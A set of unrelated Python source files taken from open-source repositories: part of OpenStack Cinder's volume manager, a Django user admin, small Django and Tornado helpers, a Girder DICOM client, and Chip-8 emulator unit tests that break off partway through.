LOG.exception(_LE("Failed to update usages deleting snapshot"))
self.db.volume_glance_metadata_delete_by_snapshot(context,
snapshot['id'])
# TODO(thangp): Switch over to use snapshot.destroy()
# after cgsnapshot-objects bugs are fixed
self.db.snapshot_destroy(context, snapshot['id'])
# Commit the reservations
if reservations:
QUOTAS.commit(context, reservations, project_id=project_id)
cgsnapshot.destroy()
LOG.info(_LI("cgsnapshot %s: deleted successfully"), cgsnapshot.id)
self._notify_about_cgsnapshot_usage(context, cgsnapshot, "delete.end",
snapshots)
def delete_group_snapshot(self, context, group_snapshot):
"""Deletes group_snapshot."""
caller_context = context
context = context.elevated()
project_id = group_snapshot.project_id
LOG.info(_LI("group_snapshot %s: deleting"), group_snapshot.id)
snapshots = objects.SnapshotList.get_all_for_group_snapshot(
context, group_snapshot.id)
self._notify_about_group_snapshot_usage(
context, group_snapshot, "delete.start")
snapshots_model_update = None
model_update = None
try:
utils.require_driver_initialized(self.driver)
LOG.debug("group_snapshot %(grp_snap_id)s: deleting",
{'grp_snap_id': group_snapshot.id})
# Pass context so that drivers that want to use it, can,
# but it is not a requirement for all drivers.
group_snapshot.context = caller_context
for snapshot in snapshots:
snapshot.context = caller_context
try:
model_update, snapshots_model_update = (
self.driver.delete_group_snapshot(context, group_snapshot,
snapshots))
except NotImplementedError:
cgsnap_type = group_types.get_default_cgsnapshot_type()
if group_snapshot.group_type_id != cgsnap_type['id']:
model_update, snapshots_model_update = (
self._delete_group_snapshot_generic(
context, group_snapshot, snapshots))
else:
cgsnapshot, snapshots = (
self._convert_group_snapshot_to_cgsnapshot(
group_snapshot, snapshots, context))
model_update, snapshots_model_update = (
self.driver.delete_cgsnapshot(context, cgsnapshot,
snapshots))
self._remove_cgsnapshot_id_from_snapshots(snapshots)
if snapshots_model_update:
for snap_model in snapshots_model_update:
# NOTE(xyang): snapshots is a list of snapshot objects.
# snapshots_model_update should be a list of dicts.
snap = next((item for item in snapshots if
item.id == snap_model['id']), None)
if snap:
snap_model.pop('id')
snap.update(snap_model)
snap.save()
if (snap_model['status'] in
[fields.SnapshotStatus.ERROR_DELETING,
fields.SnapshotStatus.ERROR] and
model_update['status'] not in
['error_deleting', 'error']):
model_update['status'] = snap_model['status']
if model_update:
if model_update['status'] in ['error_deleting', 'error']:
msg = (_('Error occurred when deleting group_snapshot '
'%s.') % group_snapshot.id)
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
else:
group_snapshot.update(model_update)
group_snapshot.save()
except exception.CinderException:
with excutils.save_and_reraise_exception():
group_snapshot.status = 'error'
group_snapshot.save()
# Update snapshot status to 'error' if driver returns
# None for snapshots_model_update.
if not snapshots_model_update:
self._remove_cgsnapshot_id_from_snapshots(snapshots)
for snapshot in snapshots:
snapshot.status = fields.SnapshotStatus.ERROR
snapshot.save()
for snapshot in snapshots:
# Get reservations
try:
if CONF.no_snapshot_gb_quota:
reserve_opts = {'snapshots': -1}
else:
reserve_opts = {
'snapshots': -1,
'gigabytes': -snapshot.volume_size,
}
volume_ref = objects.Volume.get_by_id(context,
snapshot.volume_id)
QUOTAS.add_volume_type_opts(context,
reserve_opts,
volume_ref.volume_type_id)
reservations = QUOTAS.reserve(context,
project_id=project_id,
**reserve_opts)
except Exception:
reservations = None
LOG.exception(_LE("Failed to update usages deleting snapshot"))
self.db.volume_glance_metadata_delete_by_snapshot(context,
snapshot.id)
snapshot.destroy()
# Commit the reservations
if reservations:
QUOTAS.commit(context, reservations, project_id=project_id)
group_snapshot.destroy()
LOG.info(_LI("group_snapshot %s: deleted successfully"),
group_snapshot.id)
self._notify_about_group_snapshot_usage(context, group_snapshot,
"delete.end",
snapshots)
def update_migrated_volume(self, ctxt, volume, new_volume, volume_status):
"""Finalize migration process on backend device."""
model_update = None
model_update_default = {'_name_id': new_volume.name_id,
'provider_location':
new_volume.provider_location}
try:
model_update = self.driver.update_migrated_volume(ctxt,
volume,
new_volume,
volume_status)
except NotImplementedError:
# If update_migrated_volume is not implemented for the driver,
# _name_id and provider_location will be set with the values
# from new_volume.
model_update = model_update_default
if model_update:
model_update_default.update(model_update)
# Swap keys that were changed in the source so we keep their values
# in the temporary volume's DB record.
# Need to convert 'metadata' and 'admin_metadata' since
# they are not keys of volume, their corresponding keys are
# 'volume_metadata' and 'volume_admin_metadata'.
model_update_new = dict()
for key in model_update:
if key == 'metadata':
if volume.get('volume_metadata'):
model_update_new[key] = {
metadata['key']: metadata['value']
for metadata in volume.volume_metadata}
elif key == 'admin_metadata':
model_update_new[key] = {
metadata['key']: metadata['value']
for metadata in volume.volume_admin_metadata}
else:
model_update_new[key] = volume[key]
with new_volume.obj_as_admin():
new_volume.update(model_update_new)
new_volume.save()
with volume.obj_as_admin():
volume.update(model_update_default)
volume.save()
# Replication V2.1 and a/a method
def failover(self, context, secondary_backend_id=None):
"""Failover a backend to a secondary replication target.
Instructs a replication capable/configured backend to failover
to one of it's secondary replication targets. host=None is
an acceptable input, and leaves it to the driver to failover
to the only configured target, or to choose a target on it's
own. All of the hosts volumes will be passed on to the driver
in order for it to determine the replicated volumes on the host,
if needed.
:param context: security context
:param secondary_backend_id: Specifies backend_id to fail over to
"""
updates = {}
repl_status = fields.ReplicationStatus
svc_host = vol_utils.extract_host(self.host, 'backend')
service = objects.Service.get_by_args(context, svc_host,
constants.VOLUME_BINARY)
volumes = self._get_my_volumes(context)
exception_encountered = True
try:
# For non clustered we can call v2.1 failover_host, but for
# clustered we call a/a failover method. We know a/a method
# exists because BaseVD class wouldn't have started if it didn't.
failover = getattr(self.driver,
'failover' if service.is_clustered
else 'failover_host')
# expected form of volume_update_list:
# [{volume_id: <cinder-volid>, updates: {'provider_id': xxxx....}},
# {volume_id: <cinder-volid>, updates: {'provider_id': xxxx....}}]
active_backend_id, volume_update_list = failover(
context,
volumes,
secondary_id=secondary_backend_id)
exception_encountered = False
except exception.UnableToFailOver:
LOG.exception(_LE("Failed to perform replication failover"))
updates['replication_status'] = repl_status.FAILOVER_ERROR
except exception.InvalidReplicationTarget:
LOG.exception(_LE("Invalid replication target specified "
"for failover"))
# Preserve the replication_status: Status should be failed over if
# we were failing back or if we were failing over from one
# secondary to another secondary. In both cases active_backend_id
# will be set.
if service.active_backend_id:
updates['replication_status'] = repl_status.FAILED_OVER
else:
updates['replication_status'] = repl_status.ENABLED
except exception.VolumeDriverException:
# NOTE(jdg): Drivers need to be aware if they fail during
# a failover sequence, we're expecting them to cleanup
# and make sure the driver state is such that the original
# backend is still set as primary as per driver memory
LOG.error(_LE("Driver reported error during "
"replication failover."))
updates.update(disabled=True,
replication_status=repl_status.FAILOVER_ERROR)
if exception_encountered:
LOG.error(
_LE("Error encountered during failover on host: "
"%(host)s invalid target ID %(backend_id)s"),
{'host': self.host, 'backend_id':
secondary_backend_id})
self.finish_failover(context, service, updates)
return
if secondary_backend_id == "default":
updates['replication_status'] = repl_status.ENABLED
updates['active_backend_id'] = ''
updates['disabled'] = service.frozen
updates['disabled_reason'] = 'frozen' if service.frozen else ''
else:
updates['replication_status'] = repl_status.FAILED_OVER
updates['active_backend_id'] = active_backend_id
updates['disabled'] = True
updates['disabled_reason'] = 'failed-over'
self.finish_failover(context, service, updates)
for update in volume_update_list:
# Response must include an id key: {volume_id: <cinder-uuid>}
if not update.get('volume_id'):
raise exception.UnableToFailOver(
reason=_("Update list, doesn't include volume_id"))
# Key things to consider (attaching failed-over volumes):
# provider_location
# provider_auth
# provider_id
# replication_status
vobj = objects.Volume.get_by_id(context, update['volume_id'])
vobj.update(update.get('updates', {}))
vobj.save()
LOG.info(_LI("Failed over to replication target successfully."))
# TODO(geguileo): In P - remove this
failover_host = failover
def finish_failover(self, context, service, updates):
"""Completion of the failover locally or via RPC."""
# If the service is clustered, broadcast the service changes to all
# volume services, including this one.
if service.is_clustered:
# We have to update the cluster with the same data, and we do it
# before broadcasting the failover_completed RPC call to prevent
# races with services that may be starting..
for key, value in updates.items():
setattr(service.cluster, key, value)
service.cluster.save()
rpcapi = volume_rpcapi.VolumeAPI()
rpcapi.failover_completed(context, service, updates)
else:
service.update(updates)
service.save()
def failover_completed(self, context, updates):
"""Finalize failover of this backend.
When a service is clustered and replicated the failover has 2 stages,
one that does the failover of the volumes and another that finalizes
the failover of the services themselves.
This method takes care of the last part and is called from the service
doing the failover of the volumes after finished processing the
volumes.
"""
svc_host = vol_utils.extract_host(self.host, 'backend')
service = objects.Service.get_by_args(context, svc_host,
constants.VOLUME_BINARY)
service.update(updates)
try:
self.driver.failover_completed(context, service.active_backend_id)
except Exception:
msg = _('Driver reported error during replication failover '
'completion.')
LOG.exception(msg)
service.disabled = True
service.disabled_reason = msg
service.replication_status = (
fields.ReplicationStatus.ERROR)
service.save()
def freeze_host(self, context):
"""Freeze management plane on this backend.
Basically puts the control/management plane into a
Read Only state. We should handle this in the scheduler,
however this is provided to let the driver know in case it
needs/wants to do something specific on the backend.
:param context: security context
"""
# TODO(jdg): Return from driver? or catch?
# Update status column in service entry
try:
self.driver.freeze_backend(context)
except exception.VolumeDriverException:
# NOTE(jdg): In the case of freeze, we don't really
# need the backend's consent or anything, we'll just
# disable the service, so we can just log this and
# go about our business
LOG.warning(_LW('Error encountered on Cinder backend during '
'freeze operation, service is frozen, however '
'notification to driver has failed.'))
svc_host = vol_utils.extract_host(self.host, 'backend')
service = objects.Service.get_by_args(
context,
svc_host,
constants.VOLUME_BINARY)
service.disabled = True
service.disabled_reason = "frozen"
service.save()
LOG.info(_LI("Set backend status to frozen successfully."))
return True
def thaw_host(self, context):
"""UnFreeze management plane on this backend.
Basically puts the control/management plane back into
a normal state. We should handle this in the scheduler,
however this is provided to let the driver know in case it
needs/wants to do something specific on the backend.
:param context: security context
"""
# TODO(jdg): Return from driver? or catch?
# Update status column in service entry
try:
self.driver.thaw_backend(context)
except exception.VolumeDriverException:
# NOTE(jdg): Thaw actually matters, if this call
# to the backend fails, we're stuck and can't re-enable
LOG.error(_LE('Error encountered on Cinder backend during '
'thaw operation, service will remain frozen.'))
return False
svc_host = vol_utils.extract_host(self.host, 'backend')
service = objects.Service.get_by_args(
context,
svc_host,
constants.VOLUME_BINARY)
service.disabled = False
service.disabled_reason = ""
service.save()
LOG.info(_LI("Thawed backend successfully."))
return True
def manage_existing_snapshot(self, ctxt, snapshot, ref=None):
LOG.debug('manage_existing_snapshot: managing %s.', ref)
try:
flow_engine = manage_existing_snapshot.get_flow(
ctxt,
self.db,
self.driver,
self.host,
snapshot.id,
ref)
except Exception:
msg = _LE("Failed to create manage_existing flow: "
"%(object_type)s %(object_id)s.")
LOG.exception(msg, {'object_type': 'snapshot',
'object_id': snapshot.id})
raise exception.CinderException(
_("Failed to create manage existing flow."))
with flow_utils.DynamicLogListener(flow_engine, logger=LOG):
flow_engine.run()
return snapshot.id
def get_manageable_snapshots(self, ctxt, marker, limit, offset,
sort_keys, sort_dirs, want_objects=False):
try:
utils.require_driver_initialized(self.driver)
except exception.DriverNotInitialized:
with excutils.save_and_reraise_exception():
LOG.exception(_LE("Listing manageable snapshots failed, due "
"to uninitialized driver."))
cinder_snapshots = self._get_my_snapshots(ctxt)
try:
driver_entries = self.driver.get_manageable_snapshots(
cinder_snapshots, marker, limit, offset, sort_keys, sort_dirs)
if want_objects:
driver_entries = (objects.ManageableSnapshotList.
from_primitives(ctxt, driver_entries))
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE("Listing manageable snapshots failed, due "
"to driver error."))
return driver_entries
def get_capabilities(self, context, discover):
"""Get capabilities of backend storage."""
if discover:
self.driver.init_capabilities()
capabilities = self.driver.capabilities
LOG.debug("Obtained capabilities list: %s.", capabilities)
return capabilities
def get_backup_device(self, ctxt, backup, want_objects=False):
(backup_device, is_snapshot) = (
self.driver.get_backup_device(ctxt, backup))
secure_enabled = self.driver.secure_file_operations_enabled()
backup_device_dict = {'backup_device': backup_device,
'secure_enabled': secure_enabled,
'is_snapshot': is_snapshot, }
# TODO(sborkows): from_primitive method will be removed in O, so there
# is a need to clean here then.
return (objects.BackupDeviceInfo.from_primitive(backup_device_dict,
ctxt)
if want_objects else backup_device_dict)
def secure_file_operations_enabled(self, ctxt, volume):
secure_enabled = self.driver.secure_file_operations_enabled()
return secure_enabled
def _connection_create(self, ctxt, volume, attachment, connector):
try:
self.driver.validate_connector(connector)
except exception.InvalidConnectorException as err:
raise exception.InvalidInput(reason=six.text_type(err))
except Exception as err:
err_msg = (_("Validate volume connection failed "
"(error: %(err)s).") % {'err': six.text_type(err)})
LOG.error(err_msg, resource=volume)
raise exception.VolumeBackendAPIException(data=err_msg)
try:
model_update = self.driver.create_export(ctxt.elevated(),
volume, connector)
except exception.CinderException as ex:
err_msg = (_("Create export for volume failed (%s).") % ex.msg)
LOG.exception(err_msg, resource=volume)
raise exception.VolumeBackendAPIException(data=err_msg)
try:
if model_update:
volume.update(model_update)
volume.save()
except exception.CinderException as ex:
LOG.exception(_LE("Model update failed."), resource=volume)
raise exception.ExportFailure(reason=six.text_type(ex))
try:
conn_info = self.driver.initialize_connection(volume, connector)
except Exception as err:
err_msg = (_("Driver initialize connection failed "
"(error: %(err)s).") % {'err': six.text_type(err)})
LOG.exception(err_msg, resource=volume)
self.driver.remove_export(ctxt.elevated(), volume)
raise exception.VolumeBackendAPIException(data=err_msg)
conn_info = self._parse_connection_options(ctxt, volume, conn_info)
# NOTE(jdg): Get rid of the nested dict (data key)
conn_data = conn_info.pop('data', {})
connection_info = conn_data.copy()
connection_info.update(conn_info)
values = {'volume_id': volume.id,
'attach_status': 'attaching', }
self.db.volume_attachment_update(ctxt, attachment.id, values)
self.db.attachment_specs_update_or_create(
ctxt,
attachment.id,
connector)
connection_info['attachment_id'] = attachment.id
return connection_info
def attachment_update(self,
context,
vref,
connector,
attachment_id):
"""Update/Finalize an attachment.
This call updates a valid attachment record to associate with a volume
and provide the caller with the proper connection info. Note that
this call requires an `attachment_ref`. It's expected that prior to
this call that the volume and an attachment UUID has been reserved.
param: vref: Volume object to create attachment for
param: connector: Connector object to use for attachment creation
param: attachment_ref: ID of the attachment record to update
"""
mode = connector.get('mode', 'rw')
self._notify_about_volume_usage(context, vref, 'attach.start')
attachment_ref = objects.VolumeAttachment.get_by_id(context,
attachment_id)
connection_info = self._connection_create(context,
vref,
attachment_ref,
connector)
# FIXME(jdg): get rid of this admin_meta option here, the only thing
# it does is enforce that a volume is R/O, that should be done via a
# type and not *more* metadata
volume_metadata = self.db.volume_admin_metadata_update(
context.elevated(),
attachment_ref.volume_id,
{'attached_mode': mode}, False)
if volume_metadata.get('readonly') == 'True' and mode != 'ro':
self.db.volume_update(context, vref.id,
{'status': 'error_attaching'})
self.message_api.create(
context, defined_messages.ATTACH_READONLY_VOLUME,
context.project_id, resource_type=resource_types.VOLUME,
resource_uuid=vref.id)
raise exception.InvalidVolumeAttachMode(mode=mode,
volume_id=vref.id)
try:
utils.require_driver_initialized(self.driver)
self.driver.attach_volume(context,
vref,
attachment_ref.instance_uuid,
connector.get('hostname', ''),
connector.get('mountpoint', 'na'))
except Exception:
with excutils.save_and_reraise_exception():
self.db.volume_attachment_update(
context, attachment_ref.id,
{'attach_status': 'error_attaching'})
self.db.volume_attached(context.elevated(),
attachment_ref.id,
attachment_ref.instance_uuid,
connector.get('hostname', ''),
connector.get('mountpoint', 'na'),
mode)
vref.refresh()
self._notify_about_volume_usage(context, vref, "attach.end")
LOG.info(_LI("Attach volume completed successfully."),
resource=vref)
attachment_ref = objects.VolumeAttachment.get_by_id(context,
attachment_id)
return connection_info
def _connection_terminate(self, context, volume,
attachment, force=False):
"""Remove a volume connection, but leave attachment."""
utils.require_driver_initialized(self.driver)
# TODO(jdg): Add an object method to cover this
connector = self.db.attachment_specs_get(
context,
attachment.id)
try:
shared_connections = self.driver.terminate_connection(volume,
connector,
force=force)
if not isinstance(shared_connections, bool):
shared_connections = False
except Exception as err:
err_msg = (_('Terminate volume connection failed: %(err)s')
% {'err': six.text_type(err)})
LOG.exception(err_msg, resource=volume)
raise exception.VolumeBackendAPIException(data=err_msg)
LOG.info(_LI("Terminate volume connection completed successfully."),
resource=volume)
# NOTE(jdg): Return True/False if there are other outstanding
# attachments that share this connection. If True should signify
# caller to preserve the actual host connection (work should be
# done in the brick connector as it has the knowledge of what's
# going on here.
return shared_connections
def attachment_delete(self, context, attachment_id, vref):
"""Delete/Detach the specified attachment.
Notifies the backend device that we're detaching the specified
attachment instance.
param: vref: Volume object associated with the attachment
param: attachment: Attachment reference object to remove
NOTE if the attachment reference is None, we remove all existing
attachments for the specified volume object.
"""
has_shared_connection = False
attachment_ref = objects.VolumeAttachment.get_by_id(context,
attachment_id)
if not attachment_ref:
for attachment in VA_LIST.get_all_by_volume_id(context, vref.id):
if self._do_attachment_delete(context, vref, attachment):
has_shared_connection = True
else:
has_shared_connection = (
self._do_attachment_delete(context, vref, attachment_ref))
return has_shared_connection
def _do_attachment_delete(self, context, vref, attachment):
utils.require_driver_initialized(self.driver)
self._notify_about_volume_usage(context, vref, "detach.start")
has_shared_connection = self._connection_terminate(context,
vref,
attachment)
self.driver.detach_volume(context, vref, attachment)
try:
LOG.debug('Deleting attachment %(attachment_id)s.',
{'attachment_id': attachment.id},
resource=vref)
self.driver.detach_volume(context, vref, attachment)
self.driver.remove_export(context.elevated(), vref)
except Exception:
# FIXME(jdg): Obviously our volume object is going to need some
# changes to deal with multi-attach and figuring out how to
# represent a single failed attach out of multiple attachments
# TODO(jdg): object method here
self.db.volume_attachment_update(
context, attachment.get('id'),
{'attach_status': 'error_detaching'})
else:
self.db.volume_detached(context.elevated(), vref.id,
attachment.get('id'))
self.db.volume_admin_metadata_delete(context.elevated(),
vref.id,
'attached_mode')
self._notify_about_volume_usage(context, vref, "detach.end")
return has_shared_connection
def is_volume_trusted(self, ctxt, volume_id):
volume = self.db.api.volume_get(ctxt, volume_id)
verify_trust = False
asset_tags = 'None'
host = ''
for metadata in volume.volume_metadata:
if metadata.key == 'trust':
host = volume.host.split("@")[0]
verify_trust = True
elif metadata.key == 'asset_tags':
asset_tags = metadata.value
if verify_trust:
return self.asset_tag_filter.is_trusted(host, asset_tags)
return None | ge0rgi/cinder | cinder/volume/manager.py | Python | apache-2.0 | 211,218 |
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import (
UserCreationForm,
UserChangeForm,
)
from django.forms import forms
from django.contrib import admin
from kirppu.kirppuauth.models import User
__author__ = 'codez'
class KirppuUserCreationForm(UserCreationForm):
class Meta(UserCreationForm.Meta):
model = User
def clean_username(self):
username = self.cleaned_data['username']
try:
User.objects.get(username=username)
except User.DoesNotExist:
return username
raise forms.ValidationError(
self.error_messages['duplicate_username']
)
class KirppuUserChangeForm(UserChangeForm):
class Meta(UserChangeForm.Meta):
model = User
class KirppuUserAdmin(UserAdmin):
form = KirppuUserChangeForm
add_form = KirppuUserCreationForm
admin.site.register(User, KirppuUserAdmin)
| mniemela/kirppu | kirppu/kirppuauth/admin.py | Python | mit | 929 |
from bluebottle.bluebottle_utils.managers import GenericForeignKeyManagerMixin
from django.db import models
from polymorphic import PolymorphicManager
class WallPostManager(GenericForeignKeyManagerMixin, PolymorphicManager):
pass
class ReactionManager(models.Manager):
def get_query_set(self):
queryset = super(ReactionManager, self).get_query_set()
return queryset.filter(deleted__isnull=True)
| gannetson/sportschooldeopenlucht | apps/wallposts/managers.py | Python | bsd-3-clause | 423 |
import uuid
from libs import db
from rainwave.user import User
ALLOWED_DESTINATIONS = ("web", "rw", "app", "rwpath")
class R4SetupSessionMixin:
def get_destination(self):
destination = self.get_argument("destination", "web")
if destination not in ALLOWED_DESTINATIONS:
destination = "web"
return destination
def setup_rainwave_session_and_redirect(self, user_id, destination):
session_id = str(uuid.uuid4())
db.c.update(
"INSERT INTO r4_sessions (session_id, user_id) VALUES (%s, %s)",
(session_id, user_id,)
)
self.set_cookie("r4_session_id", session_id, expires_days=365)
if destination == "app" or destination == "rw":
user = User(user_id)
user.authorize(1, None, bypass=True)
self.redirect("rw://%s:%s@rainwave.cc" % (user.id, user.ensure_api_key()),)
elif destination == "rwpath":
user = User(user_id)
user.authorize(1, None, bypass=True)
self.redirect("rwpath://rainwave.cc/%s/%s" % (user.id, user.ensure_api_key()),)
else:
self.redirect("/")
| rmcauley/rainwave | api_requests/auth/r4_mixin.py | Python | gpl-2.0 | 1,057 |
../../../../../share/pyshared/zope/interface/adapter.py | Alberto-Beralix/Beralix | i386-squashfs-root/usr/lib/python2.7/dist-packages/zope/interface/adapter.py | Python | gpl-3.0 | 55 |
"""Includes GirderDicomProcessor class.
GirderDicomProcessor class authenticates with girder instance and
processes dicom images.
Dicom files are downloaded from girder and the pixel data is extracted.
Can processes either a folder of dicom images or a single volumetric
dicom image file.
"""
import dicom
import girder_client
from io import BytesIO
import numpy as np
import os
class GirderProcessor:
def __init__(self, api_url, username, password,
folder_path=None):
"""Authenticate with girder instance then process dicom images.
:param api_url: The API URL of the girder server
:param username: The username of the girder user
:param password: The password of the girder user
:param folder_path: the unix style path to the folder containing each
individual dicom image file on girder
(default None)
:param file_path: the unix style path to the 3d dicom volumetric scan
(default None)
"""
self._client = girder_client.GirderClient(apiUrl=api_url)
self._client.authenticate(username, password)
if folder_path:
self.folder_path = folder_path
self._images = []
self._processed = False
def get_items_folders(self, folderId):
return {i['name']:i["_id"] for i in self._client.listItem(folderId)},\
{f['name']:f["_id"] for f in self._client.listFolder(folderId)}
def query_folder(self, folder_path):
"""Download and extract pixel data from images located in folder.
Scan through the file at the already given folder path and store pixel
information for each dicom image. Processed images can be accessed via
get_image method.
"""
folder = self._client.resourceLookup(folder_path)
return self.get_items_folders(folder['_id'])
def read_dicom(self, dfile, verbose=False):
"""
"""
fileId = dfile['_id']
# create file like opbject and download file to it
output = BytesIO()
if verbose:
print("Downloading file...", fileId)
self._client.downloadFile(fileId, output)
if verbose:
print("Download complete.")
# seek file position back to the front
output.seek(0)
# read file as dicom image
return dicom.read_file(output)
def get_dicom_item_series_files(self, itemID):
"""
Download and extract pixel data from dicom image file.
Scan through the file at the already given file path and store pixel
information for each dicom image slice. Processed images can be
accessed via get_image method.
"""
dfiles = [f for f in self._client.listFile(itemID) if f['mimeType'] == 'application/dicom']
return dfiles
return [self.read_dicom(dfile) for dfile in dfiles]
def get_dicom_folder_series_files(self, itemID):
"""
Download and extract pixel data from dicom image file.
Scan through the file at the already given file path and store pixel
information for each dicom image slice. Processed images can be
accessed via get_image method.
"""
dfiles = [f for f in self._client.listFile(itemID) if f['mimeType'] == 'application/dicom']
return dfiles
return [self.read_dicom(dfile) for dfile in dfiles]
def get_dicom_series(self, itemID):
"""
Download and extract pixel data from dicom image file.
Scan through the file at the already given file path and store pixel
information for each dicom image slice. Processed images can be
accessed via get_image method.
"""
dfiles = self.get_dicom_item_series_files(itemID)
return [self.read_dicom(dfile) for dfile in dfiles]
def get_case_dates(self, caseID):
_, dates = self.get_items_folders(caseID)
return dates
def get_date_exams(self, dateID):
_, exams = self.get_items_folders(dateID)
return exams
def get_exam_series(self, examID):
series, _ = self.get_items_folders(examID)
return series
def get_case_series(self, caseID):
case_series = {}
for d, did in self.get_case_dates(caseID).items():
for e, eid in self.get_date_exams(did).items():
for s, sid in self.get_exam_series(eid).items():
case_series[os.path.join(d,e,s)] = sid
return case_series
def find_matching_item_by_name(self, current_case, name_to_match):
"""
Searches the content of a directory (case) and returns the first item in
the folder matching provided pattern
Arguments:
current_case: girder ID for case/folder
name_to_match: a string containing the pattern to match in the item names
If match is successful, function returns the matched item dictionary.
Else None is returned
"""
current_items = self.get_case_series(current_case)
for key in current_items.keys():
if name_to_match in key:
return current_items[key]
else:
return None
def get_item_fileID(self, itemID, fnum=0, mimeType='application/json'):
"""
Returns the fileID for the fnum-th file of matching mimeType for an itemID
Arguments:
"""
return [f['_id'] for f in self._client.listFile(itemID) if f["mimeType"]==mimeType][fnum]
def get_vol_image_from_stack(dd):
dd.sort(key=lambda x: int(x.InstanceNumber))
vol = np.dstack([d.pixel_array for d in dd]).transpose()
meta = {"PixelSpacingX":float(dd[0].data_element("PixelSpacing").value[0]),
"PixelSpacingY":float(dd[0].data_element("PixelSpacing").value[1]),
"SliceThickness":float(dd[0].data_element("SliceThickness").value)}
return vol, meta
| chapmanbe/pymitools | pymitools/girder/girderProcessor.py | Python | apache-2.0 | 5,991 |
"""
Copyright (C) 2012-2018 Craig Thomas
This project uses an MIT style license - see LICENSE for details.
A simple Chip 8 emulator - see the README file for more information.
"""
# I M P O R T S ###############################################################
import mock
import pygame
import unittest
import collections
from mock import patch, call
from chip8.cpu import Chip8CPU, UnknownOpCodeException, MODE_EXTENDED
from chip8.screen import Chip8Screen
# C O N S T A N T S ###########################################################
KEYPRESS_TABLE = [0] * 512
# C L A S S E S ###############################################################
class TestChip8CPU(unittest.TestCase):
"""
A test class for the Chip 8 CPU.
"""
def setUp(self):
"""
Common setup routines needed for all unit tests.
"""
self.screen = mock.MagicMock()
self.cpu = Chip8CPU(self.screen)
self.cpu_spy = mock.Mock(wraps=self.cpu)
def test_return_from_subroutine(self):
for address in range(0x200, 0xFFFF, 0x10):
self.cpu.memory[self.cpu.registers['sp']] = address & 0x00FF
self.cpu.memory[self.cpu.registers['sp'] + 1] = \
(address & 0xFF00) >> 8
self.cpu.registers['sp'] += 2
self.cpu.registers['pc'] = 0
self.cpu.return_from_subroutine()
self.assertEqual(self.cpu.registers['pc'], address)
def test_jump_to_address(self):
for address in range(0, 0xFFFF, 0x10):
self.cpu.operand = address
self.cpu.registers['pc'] = 0
self.assertEqual(self.cpu.registers['pc'], 0)
self.cpu.jump_to_address()
self.assertEqual(self.cpu.registers['pc'], (address & 0x0FFF))
def test_jump_to_subroutine(self):
for address in range(0x200, 0xFFFF, 0x10):
self.cpu.operand = address
self.cpu.registers['sp'] = 0
self.cpu.registers['pc'] = 0x100
self.cpu.jump_to_subroutine()
self.assertEqual(self.cpu.registers['pc'], (address & 0x0FFF))
self.assertEqual(self.cpu.registers['sp'], 2)
self.assertEqual(self.cpu.memory[0], 0)
self.assertEqual(self.cpu.memory[1], 0x1)
def test_skip_if_reg_equal_value(self):
for register in range(0x10):
for value in range(0, 0xFF, 0x10):
for reg_value in range(0, 0xFF, 0x10):
self.cpu.operand = register << 8
self.cpu.operand += value
self.cpu.registers['v'][register] = reg_value
self.cpu.registers['pc'] = 0
self.assertEqual(self.cpu.registers['pc'], 0)
self.cpu.skip_if_reg_equal_val()
if value == reg_value:
self.assertEqual(self.cpu.registers['pc'], 2)
else:
self.assertEqual(self.cpu.registers['pc'], 0)
def test_skip_if_reg_not_equal_val(self):
for register in range(0x10):
for value in range(0, 0xFF, 0x10):
for reg_value in range(0, 0xFF, 0x10):
self.cpu.operand = register << 8
self.cpu.operand += value
self.cpu.registers['v'][register] = reg_value
self.cpu.registers['pc'] = 0
self.cpu.skip_if_reg_not_equal_val()
if value != reg_value:
self.assertEqual(self.cpu.registers['pc'], 2)
else:
self.assertEqual(self.cpu.registers['pc'], 0)
def test_skip_if_reg_equal_reg(self):
for reg_num in range(0x10):
self.cpu.registers['v'][reg_num] = reg_num
for reg_1 in range(0x10):
for reg_2 in range(0x10):
self.cpu.operand = reg_1
self.cpu.operand <<= 4
self.cpu.operand += reg_2
self.cpu.operand <<= 4
self.cpu.registers['pc'] = 0
self.assertEqual(self.cpu.registers['pc'], 0)
self.cpu.skip_if_reg_equal_reg()
# If we are testing the same register as the source and the
# destination, then a skip WILL occur
if reg_1 == reg_2:
self.assertEqual(self.cpu.registers['pc'], 2)
else:
self.assertEqual(self.cpu.registers['pc'], 0)
def test_move_value_to_reg(self):
val = 0x23
for reg_num in range(0x10):
self.assertEqual(self.cpu.registers['v'][0x0], 0)
for reg_num in range(0x10):
self.cpu.operand = 0x60 + reg_num
self.cpu.operand <<= 8
self.cpu.operand += val
self.cpu.move_value_to_reg()
for reg_to_check in range(0x10):
if reg_to_check != reg_num:
self.assertEqual(self.cpu.registers['v'][reg_to_check], 0)
else:
self.assertEqual(self.cpu.registers['v'][reg_to_check], val)
self.cpu.registers['v'][reg_num] = 0
def test_add_value_to_reg(self):
for register in range(0x10):
for reg_value in range(0, 0xFF, 0x10):
for value in range(0, 0xFF, 0x10):
self.cpu.registers['v'][register] = reg_value
self.cpu.operand = register << 8
self.cpu.operand += value
self.assertEqual(
self.cpu.registers['v'][register],
reg_value)
self.cpu.add_value_to_reg()
if value + reg_value < 256:
self.assertEqual(
self.cpu.registers['v'][register],
value + reg_value)
else:
self.assertEqual(
self.cpu.registers['v'][register],
(value + reg_value - 256))
def test_move_reg_into_reg(self):
for source in range(0x10):
for target in range(0x10):
if source != target:
self.cpu.registers['v'][target] = 0x32
self.cpu.registers['v'][source] = 0
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.move_reg_into_reg()
self.assertEqual(self.cpu.registers['v'][source], 0x32)
def test_logical_or(self):
for source in range(0x10):
for target in range(0x10):
if source != target:
for source_val in range(0, 0xFF, 0x10):
for target_val in range(0, 0xFF, 0x10):
self.cpu.registers['v'][source] = source_val
self.cpu.registers['v'][target] = target_val
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.logical_or()
self.assertEqual(
self.cpu.registers['v'][source],
source_val | target_val)
else:
for source_val in range(0, 0xFF, 0x10):
self.cpu.registers['v'][source] = source_val
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.logical_or()
self.assertEqual(
self.cpu.registers['v'][source],
source_val)
def test_logical_and(self):
for source in range(0x10):
for target in range(0x10):
if source != target:
for source_val in range(0, 0xFF, 0x10):
for target_val in range(0, 0xFF, 0x10):
self.cpu.registers['v'][source] = source_val
self.cpu.registers['v'][target] = target_val
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
